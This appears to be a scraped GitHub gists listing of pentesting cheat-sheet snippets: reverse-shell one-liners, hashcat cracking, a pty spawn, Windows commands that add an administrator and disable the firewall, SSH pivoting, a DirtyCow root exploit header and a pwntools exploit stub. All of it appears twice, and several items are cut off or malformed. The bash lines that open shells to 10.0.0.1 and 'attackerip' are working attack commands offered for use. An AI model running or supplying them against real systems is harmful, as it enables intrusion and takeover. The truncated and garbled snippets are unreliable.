waywardsun

## simple_py_shell
#!/usr/bin/python
# imports here
# Copyright 2012 TrustedSec, LLC. All rights reserved.
#
# This piece of software code is licensed under the FreeBSD license..
#
# Visit http://www.freebsd.org/copyright/freebsd-license.html for more information.
import socket,subprocess
HOST = '192.168.12.45'    # The remote host
PORT = 443            # The same port as used by the server

## password_cracking
#cracks md5(unix) hash, places found passwords in found.txt, removes them from the hasth list and uses the rockyou wordlist
hashcat -m 500 -a 0 -o found.txt --remove hashes.txt /usr/share/wordlist/rockyou.txt

## tricks
#get a pty through python
python -c 'import pty; pty.spawn("/bin/bash");'

#grab the user agent from the http header on port 10443
tcpdump -A -l -vvvs 1024 -npi eth0 port 10443

#base64 decode a string
echo STRINGTODECODE | base64 --decode

#escape jail shell

## windows_crap
#add a user
net user ryan mwcb /add

#add user to local administrators
net localgroup administrators /add ryan

#remove firewall
netsh firewall set opmode disable

#enabled remote desktop

## ssh_tricks
##SOCKS Proxy##
#Set up a SOCKS proxy on 127.0.0.1:1080 that lets you pivot through the remote host (10.0.0.1):
#Command line:
ssh -D 127.0.0.1:1080 10.0.0.1

#~/.ssh/config:
Host 10.0.0.1
DynamicForward 127.0.0.1:1080

#You can then use tsocks or similar to use non-SOCKS-aware tools on hosts accessible from 10.0.0.1:

## reverse_shells
#bash
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

#bash alt
exec /bin/bash 0&0 2>&0

#bash alt 2
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196

#bash alt 3

## cowroot.c
/*
* (un)comment correct payload first (x86 or x64)!
*
* $ gcc cowroot.c -o cowroot -pthread
* $ ./cowroot
* DirtyCow root privilege escalation
* Backing up /usr/bin/passwd.. to /tmp/bak
* Size of binary: 57048
* Racing, this may take a while..
* /usr/bin/passwd overwritten

## gist:84496cb1e4eeab23e421a6a0af60a3fa
my slides:
https://github.com/galvanic/talk-slides/blob/master/scapy.ipynb

official docs:
http://www.secdev.org/projects/scapy/demo.html
http://www.secdev.org/projects/scapy/doc/usage.html#sniffing

some tutorials from the internet:
https://theitgeekchronicles.files.wordpress.com/2012/05/scapyguide1.pdf
https://samsclass.info/124/proj11/proj17-scapy.html

## offsec.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                waywardsun
                / offsec.md
            
            
              Created
              May 17, 2017 19:09
                — forked from trietptm/offsec.md
            
              
                Penetrating Testing/Assessment Workflow
              
          
    Penetrating Testing/Assessment Workflow & other fun infosec stuff
https://github.com/jivoi/pentest
My feeble attempt to organize (in a somewhat logical fashion) the vast amount of information, tools, resources, tip and tricks surrounding penetration testing, vulnerability assessment, and information security as a whole*

Reconnaissance

Passive/Semi-Passive

Tools


Discover - https://github.com/leebaird/discover


## toilet-exploit.py
#!/usr/bin/env python2

from pwn import *
from re import findall
from random import choice, randint
from string import digits, ascii_uppercase
from hashlib import sha256
from sys import argv, exit

MAX_NAME_LEN = 64
	#!/usr/bin/python
	# imports here
	# Copyright 2012 TrustedSec, LLC. All rights reserved.
	#
	# This piece of software code is licensed under the FreeBSD license..
	#
	# Visit http://www.freebsd.org/copyright/freebsd-license.html for more information.
	import socket,subprocess
	HOST = '192.168.12.45' # The remote host
	PORT = 443 # The same port as used by the server
	#cracks md5(unix) hash, places found passwords in found.txt, removes them from the hasth list and uses the rockyou wordlist
	hashcat -m 500 -a 0 -o found.txt --remove hashes.txt /usr/share/wordlist/rockyou.txt
	#get a pty through python
	python -c 'import pty; pty.spawn("/bin/bash");'

	#grab the user agent from the http header on port 10443
	tcpdump -A -l -vvvs 1024 -npi eth0 port 10443

	#base64 decode a string
	echo STRINGTODECODE \| base64 --decode

	#escape jail shell
	#add a user
	net user ryan mwcb /add

	#add user to local administrators
	net localgroup administrators /add ryan

	#remove firewall
	netsh firewall set opmode disable

	#enabled remote desktop
	##SOCKS Proxy##
	#Set up a SOCKS proxy on 127.0.0.1:1080 that lets you pivot through the remote host (10.0.0.1):
	#Command line:
	ssh -D 127.0.0.1:1080 10.0.0.1

	#~/.ssh/config:
	Host 10.0.0.1
	DynamicForward 127.0.0.1:1080

	#You can then use tsocks or similar to use non-SOCKS-aware tools on hosts accessible from 10.0.0.1:
	#bash
	bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

	#bash alt
	exec /bin/bash 0&0 2>&0

	#bash alt 2
	0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196

	#bash alt 3
	/*
	* (un)comment correct payload first (x86 or x64)!
	*
	* $ gcc cowroot.c -o cowroot -pthread
	* $ ./cowroot
	* DirtyCow root privilege escalation
	* Backing up /usr/bin/passwd.. to /tmp/bak
	* Size of binary: 57048
	* Racing, this may take a while..
	* /usr/bin/passwd overwritten
	my slides:
	https://github.com/galvanic/talk-slides/blob/master/scapy.ipynb

	official docs:
	http://www.secdev.org/projects/scapy/demo.html
	http://www.secdev.org/projects/scapy/doc/usage.html#sniffing

	some tutorials from the internet:
	https://theitgeekchronicles.files.wordpress.com/2012/05/scapyguide1.pdf
	https://samsclass.info/124/proj11/proj17-scapy.html
	#!/usr/bin/env python2

	from pwn import *
	from re import findall
	from random import choice, randint
	from string import digits, ascii_uppercase
	from hashlib import sha256
	from sys import argv, exit

	MAX_NAME_LEN = 64